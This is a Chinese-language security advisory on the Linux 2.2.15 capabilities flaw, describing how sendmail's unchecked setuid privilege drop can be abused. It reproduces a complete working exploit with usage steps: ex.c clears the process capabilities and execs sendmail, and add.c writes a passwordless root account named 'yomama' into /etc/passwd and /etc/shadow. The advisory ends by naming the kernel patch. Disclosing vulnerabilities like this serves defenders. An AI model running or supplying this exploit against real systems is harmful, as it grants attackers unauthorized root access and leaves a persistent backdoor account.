Linux Capabilities漏洞发布时间:2000-05-16 更新时间:2000-05-16 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Linux kernel 2.2.15详细描述 POSIX在LINUX 内核中增加了"Capabilities",这些:Capabilities"是增加的权利控制形式可以起用更多的对一些进程的权利进行特别控制,"Capabilities" 采用三个bitfield,每一位代表特定的行为给一个有特权的进程可以执行。通过设置这些特殊的位,特殊权利的行为就可以控制。问题在于"Capabilities"拷贝到fork()的execs,这表示如果通过父进程修改了"Capabilities",它们可以继承,这种方法可以通过设置所有"Capabilities"为0(即BIT位为OFF)并执行一个要降低权利的SETUID程序,如SENDMAIL,当SENDMAIL使用SETUID来降低权利时,如果BIT位设置为OFF的话就不检查其返回值。SENDMAIL将继续执行超级用户的权利,并可以以ROOT身份执行用户.forward并导致权限的破坏。 测试代码 Hello all, Attached is a file with 2 sources, ex.c and add.c compile these 2 and create a file "mail": From: yomama@foobar.com To: localuser@localdomain.com Subject: foo bar . then create a .forward with: |/path/to/add then just do: ./ex < mail this should add a user yomama with uid/gid = 0 and without a password set a simple su - yomama should give you root. This exploit was written by me in a hurry, I hope there are no mistakes Greets Florian Heinz --------------C5AA82A7D9E47C75A576FD13 Content-Type: text/plain; charset=us-ascii; name="exploit.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="exploit.c" -- snip -- ex.c -- #include <linux/capability.h> int main (void) { cap_user_header_t header; cap_user_data_t data; header = malloc(8); data = malloc(12); header->pid = 0; header->version = _LINUX_CAPABILITY_VERSION; data->inheritable = data->effective = data->permitted = 0; capset(header, data); execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL); } -- snap -- ex.c -- -- snip -- add.c -- #include <fcntl.h> int main (void) { int fd; char string[40]; seteuid(0); fd = open("/etc/passwd", O_APPEND|O_WRONLY); strcpy(string, "yomama:x:0:0::/root:/bin/sh\n"); write(fd, string, strlen(string)); close(fd); fd = open("/etc/shadow", O_APPEND|O_WRONLY); strcpy(string, "yomama::11029:0:99999:7:::"); write(fd, string, strlen(string)); close(fd); } -- snap -- add.c -- 解决方案 采用Linux kernel version 2.2.16pre6补丁 相关信息 |
